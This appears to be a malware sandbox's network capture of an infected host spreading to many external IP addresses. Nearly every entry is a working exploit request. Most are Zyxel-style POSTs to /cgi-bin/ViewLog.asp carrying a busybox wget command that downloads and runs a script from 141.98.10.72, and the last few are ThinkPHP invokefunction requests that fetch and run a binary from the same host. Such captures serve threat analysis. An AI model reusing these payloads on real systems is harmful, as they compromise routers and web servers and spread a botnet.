Feb 14, 2024 09:30:01.324991941 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
483	192.168.2.15	43442	94.240.183.224	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:01.335563898 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.585225105 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.025226116 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:07.001035929 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:12.888859987 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.408663988 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:47.447901964 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:34.550816059 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
484	192.168.2.15	44446	94.122.59.207	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:01.348880053 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
485	192.168.2.15	50868	31.136.6.237	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:01.546916962 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.233261108 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:03.577189922 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:06.489114046 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:11.864981890 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:22.616878033 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.399936914 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:28.406778097 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
486	192.168.2.15	58664	31.136.12.61	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:01.547000885 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.233239889 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:03.577202082 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:06.489106894 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:11.864929914 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:22.616801023 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:45.399934053 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:28.406693935 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
487	192.168.2.15	44248	95.76.138.105	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:01.574940920 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
488	192.168.2.15	52356	94.123.143.243	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:01.596172094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
489	192.168.2.15	48334	62.29.25.191	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:01.596326113 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
490	192.168.2.15	37116	88.96.62.214	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:03.395436049 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:03.596781015 CET	503	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:03 GMT Server: Apache/2.4.38 (Debian) Content-Length: 309 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 74 69 6d 64 61 76 69 64 73 6f 6e 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at timdavidson.co.uk Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
491	192.168.2.15	51888	88.221.100.248	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:03.422935009 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:03.654779911 CET	478	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Wed, 14 Feb 2024 08:30:03 GMT Date: Wed, 14 Feb 2024 08:30:03 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 34 35 65 38 63 34 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 30 33 26 23 34 36 3b 61 35 33 35 30 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.345e8c4f.1707899403.a53501</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
492	192.168.2.15	51742	112.13.121.101	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:03.594758034 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
